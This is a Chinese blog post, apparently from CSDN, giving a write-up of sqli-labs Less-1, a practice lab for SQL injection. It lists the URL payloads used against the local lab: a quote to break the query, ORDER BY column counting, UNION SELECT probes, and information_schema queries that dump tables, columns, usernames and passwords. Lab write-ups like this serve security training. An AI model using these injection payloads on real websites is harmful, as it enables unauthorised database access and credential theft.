sqli_labs writeup

最新推荐文章于 2020-08-12 17:23:40 发布
最新推荐文章于 2020-08-12 17:23:40 发布
阅读量180 收藏 1
点赞数
分类专栏: sql注入 文章标签: sql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45769810/article/details/107647155
版权

目录

sqli_labs

Less-1

基于单引号字符注入
http://localhost/sqli_labs/Less-1/?id=1 and 1=2 正确,非数字型注入
http://localhost/sqli_labs/Less-1/?id=1’ 出错,http://localhost/sqli_labs/Less-1/?id=1’ - - ,正确,判断出注入类型

注意:- -后有一空格,我看某些博客说,在url中,加上-- ,最后会把空格给去掉,所以用- -+代替-- ,+会被url编码成空格,但是我的空格没被去掉,用+却不行。自己可以多试几种注释。

通过order by来判断字段个数
http://localhost/sqli_labs/Less-1/?id=1’ order by 3-- (–后面有一空格,后面的都有空格l)
在这里插入图片描述
找回显位置
http://localhost/sqli_labs/Less-1/?id=0’ union select 1,2,3 - -
在这里插入图片
发现回显后两个,后面爆信息就利用这两个位置。

爆数据库,用户名
http://localhost/sqli_labs/Less-1/?id=0’ union select 1,database(),user()- -
就不上图了。

爆所有表
http://localhost/sqli_labs/Less-1/?id=0’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())- -
在这里插入图片描述

爆字段
http://localhost/sqli_labs/Less-1/?id=0’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)- -
凭经验选表,没经验的,表不多的话,可以一张表一张表的试。

爆用户名和密码
http://localhost/sqli_labs/Less-1/?id=0’ union select 1,(select group_concat(username) from users),(select group_concat(password) from users)- -
在这里插入图片描述
用户名和密码是一 一对应的。

以上- -后面都有空格哈。

Less-2

更新中……

是痞子呀
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
新版PHPStudy可用sqli_labs 靶机.zip
03-01
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
sqli-lab——Writeup(38~over)堆叠等......
weixin_45694388的博客
12-13 667
知识点: 1.堆叠注入原理(stacked injection) 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 1.1与union查询区别 而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。 1.2使用实例 例如以下这个例子。用
sqli-labs writeup(less1---less38)
weixin_30905133的博客
08-11 63
本文参考了一些其他文章 https://www.cnblogs.com/lcamry/category/846064.html详解推荐 http://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247486774&idx=1&sn=b3f24b3861f9c6e2862365bfee282965&chksm...
sqli-labs writeup
a370793934的专栏
11-26 442
第1关 union注入 有报错 字符型注入 http://localhost/sqli-labs-master/Less-1/?id=1' 输入?id=1'报错 输入?id=1 and 1=1 正常 输入?id=1 and 1=2 正常 说明非数字型,为字符型,输入结果被两个单引号' '包裹起来 输入?id=1"正常 再次确认确实是单引号包裹 http://localhost/s...
SQLi Labs writeup (附py脚本)
Le0nis的博客
07-22 1858
less-1GET – 报错注入 – 单引号 – 字符型 PHP代码为: SELECT * FROM users WHERE id='$id' LIMIT 0,1 SQL实际语句为: SELECT * FROM users WHERE id='1' LIMIT 0,1; 1、判断注入 ?id=1
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
sqli-labs-master.zip
03-17
SQL-labs靶场,练习sql注入,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs Writeup
Yukikaze_cxy
05-30 247
【基础储备】=常用的url编码=%20 空格%22 "%23 #%27 '=字符串连接函数=concat_ws(字段1,字段2...)concat(字段1,字段2...)=mysql一些函数=user():当前数据库连接使用的用户database():当前连接使用的数据库version():当前数据库的版本=information_schema库中常用的表=SCHEMATA:存储数据库的基本信息(...
sqli-labs-通关writeup 1-10
逆时针向_Ly的博客
08-12 284
Less 1-10 文章目录Less 1-10Less-1 基于错误的GET单引号字符型注入Less-2 基于错误的GET整型注入Less-3 基于错误的GET单引号变形字符型注入Less-4 基于错误的GET双引号字符型注入Less-5 双注入GET单引号字符型注入Less-6 双注入GET双引号字符型注入Less-7 导出文件GET字符型注入Less-8 布尔型单引号GET盲注Less-9 基于时间的GET单引号盲注Less-10 基于时间的双引号盲注 Less-1 基于错误的GET单引号字符型注入
sqli-labs
这个博客,写给十年后的自己......
05-30 1613
安装 参考自github介绍 cd /opt/lampp/htdocs git clone https://git.oschina.net/jiaruipeng/sqli-labs.git 这是放到了自己的git上 cd sqli-labs/sql-connections && vim db-creds.inc 更改mysql用户名和密码,xampp默认的就是root,密码
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 1848
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
sqlilabs教程(1-10)
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
通过sqli-labs学习sql注入——基础挑战之less11-22
giantbranch的专栏
05-19 1万+
上一次就讲了基础挑战之less1-10,都是get型的,包含的种类也是比较多了,这次的是post型注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战之less1-10会有,这里不会讲以前讲过了知识了,还有盲注的python脚步哦,有需要的链接去看看 工具 还是火狐+hackbar插件 看看要post提交的字段吧,uname和p
sqli-labs通关-------00下载搭建靶场环境
枯藤闲画云
05-30 1513
下载靶场 https://github.com/Audi-1/sqli-labs 放到phpstudy www目录下 或者自己linux搭建一个。 按照readme里面的操作通过其自带程序配置数据库。 目前我刚学到的注入方式 Get post 万能密码 头 时间盲注 布尔盲注 宽字节注入(通过gbk编码吃掉转义) dns注入( http://ceye.io unc路径 \\select ...
sqli_labs适配php7以上版本
最新发布
12-03
sqli_labs 是一个用于学习 SQL 注入漏洞的实验平台,它旨在帮助安全研究人员加深对 SQL 注入的理解和实践。 在适配 sqli_labs 到 PHP 7.x 版本的过程中,我们主要需要解决以下几个方面的问题。 首先,PHP 7.x 的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值